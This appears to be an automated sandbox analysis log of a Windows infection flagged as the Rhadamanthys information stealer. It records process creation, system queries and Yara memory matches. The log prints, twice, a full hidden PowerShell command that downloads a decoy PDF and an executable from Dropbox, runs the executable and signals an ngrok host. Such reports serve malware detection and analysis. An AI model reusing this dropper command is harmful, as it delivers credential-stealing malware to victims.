Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe "C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe"
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -noprofile -command "$randompdf = join-path -path $env:temp -childpath ('{0}.pdf' -f ([guid]::newguid())); $randomexe = join-path -path $env:temp -childpath ('{0}.exe' -f ([guid]::newguid())); invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/lewis-silkin-llp.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -outfile $randompdf; start-process -filepath 'msedge.exe' -argumentlist '--kiosk', $randompdf; invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -outfile $randomexe; start-process -filepath $randomexe; if (test-path $randomexe) { invoke-webrequest -uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -noprofile -command "$randompdf = join-path -path $env:temp -childpath ('{0}.pdf' -f ([guid]::newguid())); $randomexe = join-path -path $env:temp -childpath ('{0}.exe' -f ([guid]::newguid())); invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/lewis-silkin-llp.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -outfile $randompdf; start-process -filepath 'msedge.exe' -argumentlist '--kiosk', $randompdf; invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -outfile $randomexe; start-process -filepath $randomexe; if (test-path $randomexe) { invoke-webrequest -uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }"

Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe

Code function: 28_3_02C5CDD5 cpuid

28_3_02C5CDD5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 0000001C.00000002.2374916826.0000000003080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2363201778.0000000002E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2367710824.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2472399777.0000000003600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 0000001C.00000002.2374916826.0000000003080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2363201778.0000000002E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2367710824.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2472399777.0000000003600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

